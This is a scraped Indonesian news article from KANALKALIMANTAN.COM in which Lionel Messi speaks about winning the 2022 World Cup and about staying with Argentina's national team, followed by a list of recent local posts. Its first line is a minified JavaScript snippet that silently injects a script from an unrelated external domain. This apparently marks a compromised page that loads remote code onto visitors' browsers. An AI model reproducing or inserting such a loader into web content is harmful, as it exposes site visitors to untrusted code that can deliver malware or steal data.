(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
HEADLINE

La Pulga Seakan Tahu Bakal Menang Piala Dunia


KANALKALIMANTAN.COM – Kapten tim nasional Argentina, Lionel Messi sangat gembira setelah akhirnya mendapatkan Piala Dunia.

Setelah kemenangan adu penalti yang dramatis atas Prancis, pemain bernomor punggung 10 mengatakan, tahu bahwa Tuhan akan membalasnya dengan hadiah utama Piala Dunia 2022 di Qatar.

“Sangat mengesankan saya bisa menyelesaikan seperti ini,” kata Messi kepada wartawan seperti dikutip dari Marca, Senin (19/12/2022).

“Saya tahu bahwa pada suatu saat Tuhan akan memberikannya kepada saya dan saya tidak tahu mengapa, tetapi saya merasa akan seperti ini. Sekali lagi dia membuat saya sangat bahagia,” sambungnya.

 

Baca juga : 7 Rekor Gemerlap Si Kutu Usai Bawa Tim Tango Juara Piala Dunia 2022

Messi menggambarkan bahwa laga melawan Prancis “sangat aneh”, mengingat bagaimana tim Eropa itu menyamakan kedudukan dua kali, membandingkannya dengan pertandingan melawan Belanda saat perempat final.

“Kami menginginkannya (Piala Dunia), tapi akhirnya datang,” kata Messi tak lama setelah mengangkat Piala Dunia ke langit.

“Kami banyak menderita, tapi kami berhasil. Kami tidak sabar berada di Argentina untuk melihat betapa gilanya hal itu,” sambungnya.

Meskipun mencapai banyak hal dalam kariernya, Messi menyadari bahwa menjadi juara dunia adalah hal terbesar yang terjadi dalam kariernya.

Baca juga  : Kawanan Pemalak BBM Spesialis Tugboat di Sungai Barito Dibekuk Polres Barsel

“Tidak ada apa-apa setelah ini. Apa lagi setelah memenangkan Copa America dan Piala Dunia menjelang akhir karier saya. Tapi di sisi lain, saya suka sepak bola, saya menikmati apa yang saya lakukan, saya menikmati tim nasional,” tambahnya.

“Semua orang menginginkan trofi ini, itu adalah impian masa kecil semua orang. Saya cukup beruntung telah mencapai segalanya dalam karier saya dan sekarang ini akan pulang, untuk menikmatinya bersamamu,” lanjut La Pulga.

Tetap Bersama Tim Tango

Messi menambahkan bahwa dia tidak pensiun dari tim nasional Argentina setelah memenangkan Piala Dunia di Qatar.

“Saya tidak pensiun dari tim nasional,” katanya. “Saya ingin terus bermain untuk Argentina untuk menghormati gelar juara dunia. Ini adalah gelar yang saya lewatkan dan ini dia. Ini gila. Sudah lama menunggu.” (Suara.com)

Editor : kk


Desy Arfianty

Recent Posts

Pelantikan Pengurus Wilayah Keluarga Besar PII Kalsel

KANALKALIMANTAN.COM, BANJARMASIN – 4 Mei diperingati Hari Bangkit (Harba) organisasi pelajar tertua di Tanah Air,… Read More

42 menit ago

Lesti Kejora Hingga Ria Ricis Siap Ramaikan Silet Awards 2024!

KANALKALIMANTAN.COM, - Ajang penghargaan paling dramatis dan paling sensasional yang ditunggu masyarakat, Silet Awards 2024… Read More

1 jam ago

Kontes Motor 2Tak “Entwosiastrokes Volume 2 2024” di Banjarbaru, Ajang Adu Para Modifikator Banua

KANALKALIMANTAN.COM, BANJARBARU - Wali Kota Banjarbaru Aditya Mufti Ariffin mengapreasiasi penyelenggaraan event kontes motor "Entwosiastrokes… Read More

2 jam ago

Kali Pertama Airbus A340 Layani Jemaah Haji Embarkasi Banjarmasin

Penerbangan Kloter 1 Sempat Terlambat 30 Menit Read More

6 jam ago

100 Peserta Ramaikan Kejuaraan Catur se Kalteng Piala Pj Bupati Kapuas

KANALKALIMANTAN.COM, KUALA KAPUAS - Kejuaraan catur piala Pj Bupati Kapuas se Kalimantan Tengah dibuka oleh… Read More

9 jam ago

Embarkasi Haji Banjarmasin Berangkatkan Kloter 1, 320 Jemaah Menuju Madinah

KANALKALIMANTAN.COM, BANJARBARU - Jemaah haji Kloter pertama diberangkatkan dari Asrama Haji Embarkasi Banjarmasin di Banjarbaru,… Read More

9 jam ago

This website uses cookies.